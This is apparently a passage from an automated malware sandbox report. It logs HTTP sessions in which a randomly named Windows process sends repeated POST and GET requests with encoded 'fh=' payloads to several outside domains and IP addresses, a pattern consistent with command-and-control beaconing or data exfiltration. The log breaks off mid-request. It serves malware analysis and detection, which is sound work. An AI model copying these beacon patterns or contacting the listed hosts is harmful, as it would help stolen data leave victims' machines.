                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Data Ascii: fh=wvRL/7AjjEcZOppGVkFB6UvouSNgv4PXSHI7suZRbQ5gBUiPyljHMWk3G7rNQuTKA+iePx9GeN7rm/4q+ljAY/t89T6Ui89riPl8mVICFRE5a8JMsIJUxFmIrAs3CtpuH3PS1l7E4fEbhjxrntIXqpoECEZoSMJ1lPozLVQI3d+t0Z4y7pqu4SkFxV1vdVjuev87nHPdpyW98FevZhYvgAfNalDn


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                3 | 192.168.2.5 | 49849 | 13.248.169.48 | 80 | 1536 | C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 3, 2024 14:21:55.980192900 CET | 1814 | OUT | POST /440l/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.egyshare.xyz
                                                                                Origin: http://www.egyshare.xyz
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: max-age=0
                                                                                Connection: close
                                                                                Content-Length: 1239
                                                                                Referer: http://www.egyshare.xyz/440l/
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                4 | 192.168.2.5 | 49855 | 13.248.169.48 | 80 | 1536 | C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 3, 2024 14:21:58.647058010 CET | 524 | OUT | GET /440l/?fh=9t5r8PtstBUGfqpIeh5XnEiswD9luMiEeVsajtw7Z3dqDkGB8mLGChY9CqfKEaHyEvKJDzANYYXJmO8Xh0K1SfJD5zmz57pelvxK6DYsSAIhb49b75Fyr268iC5rfP5+VA==&jnGlY=dHeXwH1PkJZDr HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Host: www.egyshare.xyz
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Dec 3, 2024 14:21:59.785680056 CET | 410 | IN | HTTP/1.1 200 OK
                                                                                Server: openresty
                                                                                Date: Tue, 03 Dec 2024 13:21:59 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 270
                                                                                Connection: close
                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?fh=9t5r8PtstBUGfqpIeh5XnEiswD9luMiEeVsajtw7Z3dqDkGB8mLGChY9CqfKEaHyEvKJDzANYYXJmO8Xh0K1SfJD5zmz57pelvxK6DYsSAIhb49b75Fyr268iC5rfP5+VA==&jnGlY=dHeXwH1PkJZDr"}</script></head></html>


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                5 | 192.168.2.5 | 49871 | 84.32.84.32 | 80 | 1536 | C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 3, 2024 14:22:05.276699066 CET | 786 | OUT | POST /8mlm/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.appsolucao.shop
                                                                                Origin: http://www.appsolucao.shop
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: max-age=0
                                                                                Connection: close
                                                                                Content-Length: 203
                                                                                Referer: http://www.appsolucao.shop/8mlm/
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Data Ascii: fh=OqGeeDG6ttkNIYsmVCYeKEMOCw8UpMfNoMJb9u/4zL+jG3aV4vklMVPyxFphzfFPP/heGJwuQploEZeceqVhU1xC+wbKAc63NQnJLPrXVuUZ4mumwDNwYSzD6ytaXm2X3+ZHnVF3tvw+OSM8Y+gU8IUg4H1sFM87Ln9Aj+JyD8yvEkE4mqynvubFAzloSk7/EJCpBQM=


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                6 | 192.168.2.5 | 49877 | 84.32.84.32 | 80 | 1536 | C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 3, 2024 14:22:07.950037956 CET | 806 | OUT | POST /8mlm/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.appsolucao.shop
                                                                                Origin: http://www.appsolucao.shop
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: max-age=0
                                                                                Connection: close
                                                                                Content-Length: 223
                                                                                Referer: http://www.appsolucao.shop/8mlm/
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Data Ascii: fh=OqGeeDG6ttkNJ70mSjYeb0MRNQ8UjsfBoMFb9sToz5KjHVCV5uklLVPy6lpuuvEBP/dJGMIuQpZoEbGcZZNiVlwk1QbUEc63NQnJLPuAVucZ4Vmm/GtzSyzMsitaTm2T3+ZhnXgctqs+OWA8Yq0X1IVl8H1yGZRIMHt/jd8qQvKpBS1S8I6P8O39QgtfDUaWeqSZfHaNRu8Amqy6bnkujSdG/wET


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                7 | 192.168.2.5 | 49883 | 84.32.84.32 | 80 | 1536 | C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 3, 2024 14:22:10.620232105 CET | 1823 | OUT | POST /8mlm/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.appsolucao.shop
                                                                                Origin: http://www.appsolucao.shop
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: max-age=0
                                                                                Connection: close
                                                                                Content-Length: 1239
                                                                                Referer: http://www.appsolucao.shop/8mlm/
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                8 | 192.168.2.5 | 49890 | 84.32.84.32 | 80 | 1536 | C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 3, 2024 14:22:13.270989895 CET | 527 | OUT | GET /8mlm/?jnGlY=dHeXwH1PkJZDr&fh=Dou+d174n903Q5s8eGVlbncTBC0Rpufru8Nex+2NzpzCLkW84PIBEnPU/VIOuudaHO13J+F+WsJAELWMIa4GeHkI0VbuKcGIGxf8Na/XWMFk3HWS90xtCxfW9k4DFGjEgQ== HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Host: www.appsolucao.shop
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Dec 3, 2024 14:22:14.454948902 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                Date: Tue, 03 Dec 2024 13:22:14 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 9973
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Server: hcdn
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                x-hcdn-request-id: 0472efbf84949814b621b5ce8c4e12ad-bos-edge1
                                                                                Expires: Tue, 03 Dec 2024 13:22:13 GMT
                                                                                Cache-Control: no-cache
                                                                                Accept-Ranges: bytes
                                                                                Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"O
                                                                                Data Ascii: .split("."),e=[],n=0;n<r.length;++n){var t=r[n];e.push(t.match(/[^A-Za-z0-9-]/)?"xn--"+punycode.encode(t):t)}return e.join(".")},this.ToUnicode=function(o){for(var r=o.split("."),e=[],n=0;n<r.length;++n){var t=r[n];e.push(t.match(/^xn--/)?puny


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.5 | 49905 | 84.32.84.32 | 80 | 1536 | C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:22:20.339613914 CET | 786 | OUT | POST /3ifu/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.samundri.online
                                                                                Origin: http://www.samundri.online
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: max-age=0
                                                                                Connection: close
                                                                                Content-Length: 203
                                                                                Referer: http://www.samundri.online/3ifu/
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.5 | 49913 | 84.32.84.32 | 80 | 1536 | C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:22:23.004879951 CET | 806 | OUT | POST /3ifu/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.samundri.online
                                                                                Origin: http://www.samundri.online
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: max-age=0
                                                                                Connection: close
                                                                                Content-Length: 223
                                                                                Referer: http://www.samundri.online/3ifu/
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.5 | 49919 | 84.32.84.32 | 80 | 1536 | C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:22:25.677642107 CET | 1823 | OUT | POST /3ifu/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.samundri.online
                                                                                Origin: http://www.samundri.online
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: max-age=0
                                                                                Connection: close
                                                                                Content-Length: 1239
                                                                                Referer: http://www.samundri.online/3ifu/
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.5 | 49927 | 84.32.84.32 | 80 | 1536 | C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:22:28.337583065 CET | 527 | OUT | GET /3ifu/?fh=u5oj/oWevlm54LOT1+Bryx675u+IDrtDZr257qJzt/2kXoBMan19x+0MdpxIfeL/WChZbD4JNYT/SNFPC81SuzkGtTD08CNBMN4l2lkk/418RVw+aNXyvs4RLuFyzfcvLA==&jnGlY=dHeXwH1PkJZDr HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Host: www.samundri.online
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Dec 3, 2024 14:22:29.470979929 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                Date: Tue, 03 Dec 2024 13:22:29 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 9973
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Server: hcdn
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                x-hcdn-request-id: 2a39778b58ce54710f7549972affe0d2-bos-edge3
                                                                                Expires: Tue, 03 Dec 2024 13:22:28 GMT
                                                                                Cache-Control: no-cache
                                                                                Accept-Ranges: bytes
                                                                                Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"O


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.5 | 49943 | 209.74.77.107 | 80 | 1536 | C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:22:35.430665970 CET | 780 | OUT | POST /4ii9/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.happyjam.life
                                                                                Origin: http://www.happyjam.life
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: max-age=0
                                                                                Connection: close
                                                                                Content-Length: 203
                                                                                Referer: http://www.happyjam.life/4ii9/
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Dec 3, 2024 14:22:36.727591038 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                Date: Tue, 03 Dec 2024 13:22:36 GMT
                                                                                Server: Apache
                                                                                Content-Length: 389
                                                                                Connection: close
                                                                                Content-Type: text/html
                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.5 | 49949 | 209.74.77.107 | 80 | 1536 | C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:22:38.088601112 CET | 800 | OUT | POST /4ii9/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.happyjam.life
                                                                                Origin: http://www.happyjam.life
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: max-age=0
                                                                                Connection: close
                                                                                Content-Length: 223
                                                                                Referer: http://www.happyjam.life/4ii9/
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Dec 3, 2024 14:22:39.404553890 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                Date: Tue, 03 Dec 2024 13:22:39 GMT
                                                                                Server: Apache
                                                                                Content-Length: 389
                                                                                Connection: close
                                                                                Content-Type: text/html
                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                Session ID    Source IP      Source Port    Destination IP     Destination Port    PID     Process
                                                                                15            192.168.2.5    49955          209.74.77.107      80                  1536    C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                Timestamp                             Bytes transferred    Direction    Data
                                                                                Dec 3, 2024 14:22:40.753995895 CET    1817                 OUT          POST /4ii9/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.happyjam.life
                                                                                Origin: http://www.happyjam.life
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: max-age=0
                                                                                Connection: close
                                                                                Content-Length: 1239
                                                                                Referer: http://www.happyjam.life/4ii9/
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Dec 3, 2024 14:22:42.087258101 CET    533                  IN           HTTP/1.1 404 Not Found
                                                                                Date: Tue, 03 Dec 2024 13:22:41 GMT
                                                                                Server: Apache
                                                                                Content-Length: 389
                                                                                Connection: close
                                                                                Content-Type: text/html
                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                Session ID    Source IP      Source Port    Destination IP     Destination Port    PID     Process
                                                                                16            192.168.2.5    49961          209.74.77.107      80                  1536    C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                Timestamp                             Bytes transferred    Direction    Data
                                                                                Dec 3, 2024 14:22:43.464313030 CET    525                  OUT          GET /4ii9/?fh=DCK/bgCIPtpt2RJApr/S57a5c6dyUmc4/YRC2H7mEi+GV8MabGqvART7ZhzmedatEBHVT2HbXE2R9ehhzokwzGc74THGa4p/rcEpcgteY+NZBAve/cPV6mEezHweDFAvow==&jnGlY=dHeXwH1PkJZDr HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Host: www.happyjam.life
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Dec 3, 2024 14:22:44.685353041 CET    548                  IN           HTTP/1.1 404 Not Found
                                                                                Date: Tue, 03 Dec 2024 13:22:44 GMT
                                                                                Server: Apache
                                                                                Content-Length: 389
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                Session ID    Source IP      Source Port    Destination IP     Destination Port    PID     Process
                                                                                17            192.168.2.5    49978          38.47.207.164      80                  1536    C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                Timestamp                             Bytes transferred    Direction    Data
                                                                                Dec 3, 2024 14:22:50.343693018 CET    768                  OUT          POST /sa1b/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.t19yd.top
                                                                                Origin: http://www.t19yd.top
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: max-age=0
                                                                                Connection: close
                                                                                Content-Length: 203
                                                                                Referer: http://www.t19yd.top/sa1b/
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Data Ascii: fh=aavpWf/DMtk8+imFwKpHkHCzRq7SKOKDceuhH5T6omDm55goG+Y7VV83QWBb5mVdmy/tSgobXxCn+s5bFPZRbDok4tyYEbX3cnUQZ/LixA91eryKlYksbvIA8tZ4OL+k5XBXuY+bMUzY5eKFsS82HDPojwD8pp4/m0fawEH0huhixVxld5JK/HSR5y8Wbn7BXGCGxmI=
                                                                                Dec 3, 2024 14:22:51.858640909 CET    302                  IN           HTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Tue, 03 Dec 2024 13:22:51 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 138
                                                                                Connection: close
                                                                                ETag: "6693de8b-8a"
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                Session ID    Source IP      Source Port    Destination IP     Destination Port    PID     Process
                                                                                18            192.168.2.5    49985          38.47.207.164      80                  1536    C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                Timestamp                             Bytes transferred    Direction    Data
                                                                                Dec 3, 2024 14:22:53.051351070 CET    788                  OUT          POST /sa1b/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.t19yd.top
                                                                                Origin: http://www.t19yd.top
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: max-age=0
                                                                                Connection: close
                                                                                Content-Length: 223
                                                                                Referer: http://www.t19yd.top/sa1b/
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Data Ascii: fh=aavpWf/DMtk84C2FytdHinCwfK7SEuKHceShH7+irUXm5YwoH8g7Y183JmBa3GVsmyzfSi8bXwin+uxbF8heYzomzNyWK7X3cnUQZ/vIxBV1ZbiKn9IjSPIPo9Z4KL+e5XB1uZi9MWbY5cSFsnI3MDPuuQCun8AxhXHOs3nyhvdN9DAPHbBisn+pph0hKXaoNlS2vxe5rsdKnC1ittnphgFm4OP2
                                                                                Dec 3, 2024 14:22:54.666712046 CET    302                  IN           HTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Tue, 03 Dec 2024 13:22:54 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 138
                                                                                Connection: close
                                                                                ETag: "6693de8b-8a"
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                Session ID    Source IP      Source Port    Destination IP     Destination Port    PID     Process
                                                                                19            192.168.2.5    49992          38.47.207.164      80                  1536    C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                Timestamp                             Bytes transferred    Direction    Data
                                                                                Dec 3, 2024 14:22:55.747797012 CET    1805                 OUT          POST /sa1b/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.t19yd.top
                                                                                Origin: http://www.t19yd.top
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: max-age=0
                                                                                Connection: close
                                                                                Content-Length: 1239
                                                                                Referer: http://www.t19yd.top/sa1b/
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Dec 3, 2024 14:22:57.322221994 CET    302                  IN           HTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Tue, 03 Dec 2024 13:22:57 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 138
                                                                                Connection: close
                                                                                ETag: "6693de8b-8a"
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                Session ID    Source IP      Source Port    Destination IP     Destination Port    PID     Process
                                                                                20            192.168.2.5    49998          38.47.207.164      80                  1536    C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                Timestamp                             Bytes transferred    Direction    Data
                                                                                Dec 3, 2024 14:22:58.417763948 CET    521                  OUT          GET /sa1b/?fh=XYHJVoT0LuIOm26Tyq9N91avW6u0HKWTSvSmIrnltmLk6JYzFfgCVHRXJm9nnHtkqw/GQg9hdUic1chKWcYHIwgC/veVHbD1fWEHf5TqpC81TauCsO8XC98q6/wqQrn6ig==&jnGlY=dHeXwH1PkJZDr HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
